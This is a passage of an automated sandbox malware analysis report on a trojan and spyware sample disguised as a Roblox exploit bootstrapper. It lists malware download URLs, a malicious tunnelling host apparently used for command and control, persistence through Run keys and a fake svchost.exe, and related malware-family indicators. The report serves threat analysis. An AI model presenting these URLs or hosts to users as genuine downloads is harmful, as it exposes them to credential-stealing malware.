                                                                                                                                                                                                    https://8049c006.solaraweb-alj.pages.dev/download/static/files/SolaBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.jsonBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://Passport.NET/tb:ppsvchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2616358062.0000029107A98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd#shasvchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAoADIVfOzsvchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://www.nuget.org/packages/Newtonsoft.Json.BsonBootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://aka.ms/pscore68powershell.exe, 00000005.00000002.1448022364.000001A9873F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D16F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863871000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://nodejs.orgBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              208.95.112.1
                                                                                                                                                                                                                              		ip-api.comUnited States
                                                                                                                                                                                                                              		53334TUT-ASUSfalse
                                                                                                                                                                                                                              128.116.119.3
                                                                                                                                                                                                                              		edge-term4-lhr2.roblox.comUnited States
                                                                                                                                                                                                                              		22697ROBLOX-PRODUCTIONUSfalse
                                                                                                                                                                                                                              147.185.221.24
                                                                                                                                                                                                                              		award-adware.gl.at.ply.ggUnited States
                                                                                                                                                                                                                              		12087SALSGIVERUStrue
                                                                                                                                                                                                                              104.21.93.27
                                                                                                                                                                                                                              		getsolara.devUnited States
                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              104.20.22.46
                                                                                                                                                                                                                              		nodejs.orgUnited States
                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                              Private

                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1566238
                                                                                                                                                                                                                              Start date and time:2024-12-01 20:07:07 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 8m 4s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:30
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:sDKRz09zM7.exe
                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                              Original Sample Name:51edcfc381c90d4b6408aa58f991b14d7d7d57a3597550ecc63c663ebfd095d2.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@32/33@6/6
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 9.1%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 98%
                                                                                                                                                                                                                              • Number of executed functions: 245
                                                                                                                                                                                                                              • Number of non-executed functions: 10
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.190.147.6, 20.190.177.84, 20.190.177.19, 20.190.147.8, 20.190.177.82, 20.190.177.147, 20.190.147.4, 20.190.147.1, 20.189.173.20
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                              • Execution Graph export aborted for target BootstrapperV1.23_ModdedByHisako.exe, PID 7424 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1148 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1640 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7900 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target sDKRz09zM7.exe, PID 7316 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target svchost.exe, PID 5636 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target svchost.exe, PID 7060 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target svchost.exe, PID 7640 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target svchost.exe, PID 7732 because it is empty
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                              • VT rate limit hit for: sDKRz09zM7.exe

                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              14:08:02API Interceptor78x Sleep call for process: BootstrapperV1.23_ModdedByHisako.exe modified
                                                                                                                                                                                                                              14:08:03API Interceptor63x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                              14:08:29API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                              14:09:17API Interceptor38x Sleep call for process: not rat.exe modified
                                                                                                                                                                                                                              20:09:13Task SchedulerRun new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                              20:09:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                              20:09:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                              20:09:32AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              208.95.112.1miIs5mgmnJ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                              5IuEMtvQV5.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                              nbothjkd.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                                                              jgesfyhjsefa.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                                                              Opera.exeGet hashmaliciousZTratBrowse
                                                                                                                                                                                                                              • ip-api.com/xml/?fields=countryCode,query
                                                                                                                                                                                                                              88851n80.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • www.ip-api.com/line/?fields=16401
                                                                                                                                                                                                                              saloader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                              • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                              88851n80.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • www.ip-api.com/line/?fields=16401
                                                                                                                                                                                                                              file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                                                                                                                                                              • ip-api.com/json
                                                                                                                                                                                                                              128.116.119.3kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      https://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          RFAwChXSve.exeGet hashmaliciousDCRatBrowse

                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            www.nodejs.orgkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            getsolara.devkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            nodejs.orgkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            edge-term4-lhr2.roblox.comkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            https://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3

                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            ROBLOX-PRODUCTIONUSkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                                                            KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                                                            AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                            • 128.116.44.3
                                                                                                                                                                                                                                            IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 128.116.44.4
                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.110.16
                                                                                                                                                                                                                                            cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 128.116.21.4
                                                                                                                                                                                                                                            TUT-ASUSmiIs5mgmnJ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            5IuEMtvQV5.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            nbothjkd.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            jgesfyhjsefa.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            Opera.exeGet hashmaliciousZTratBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            88851n80.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            saloader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            88851n80.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                                            SALSGIVERUSmiIs5mgmnJ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.24
                                                                                                                                                                                                                                            88xEblpl6Y.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.24
                                                                                                                                                                                                                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 147.185.47.212
                                                                                                                                                                                                                                            loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 65.199.17.173
                                                                                                                                                                                                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                            • 147.168.113.41
                                                                                                                                                                                                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 147.170.50.225
                                                                                                                                                                                                                                            apep.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 147.176.207.118
                                                                                                                                                                                                                                            CZxDiTktSY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.24
                                                                                                                                                                                                                                            TcQOmn7lnP.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.24
                                                                                                                                                                                                                                            owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.19

                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0e5fEYPS3M8Q.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            1d5sraR1S1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            back.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            og.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            bold.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            ad.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            invoice-6483728493.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            tnsoldfik82.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            • 104.20.22.46

                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.2_97eb82c4f786297f6958ff3ced1f3b7151bef6f1_59cdc555_5aef9a65-c520-4a5a-a317-f37d12631f57\Report.wer

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                                            Entropy (8bit):1.2452632277344875
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:eIJHcROr0bU9+dQ1aWxUlRpCTZizuiFFZ24lO8o:NZcRRbG+dQ1ama/QZizuiFFY4lO8o
                                                                                                                                                                                                                                            MD5:06BC2792CD6E60E8A1901A7282368652
                                                                                                                                                                                                                                            SHA1:2987EF377F9C2C186D4F70A14F56829B124F6DF2
                                                                                                                                                                                                                                            SHA-256:E28156C589F18B70C3F749F1CF16B527CBD31B06CE5E8B388A980DFA5E88A763
                                                                                                                                                                                                                                            SHA-512:181E9B918E1198806ECA920CD7017B003F7EFE6D956FDA2300A25C07B6FC00AF9457D5563C30F6699A64002BD901ACBD88D9C5B4C2F028958C2C191FD9002D7E
                                                                                                                                                                                                                                            Malicious:false
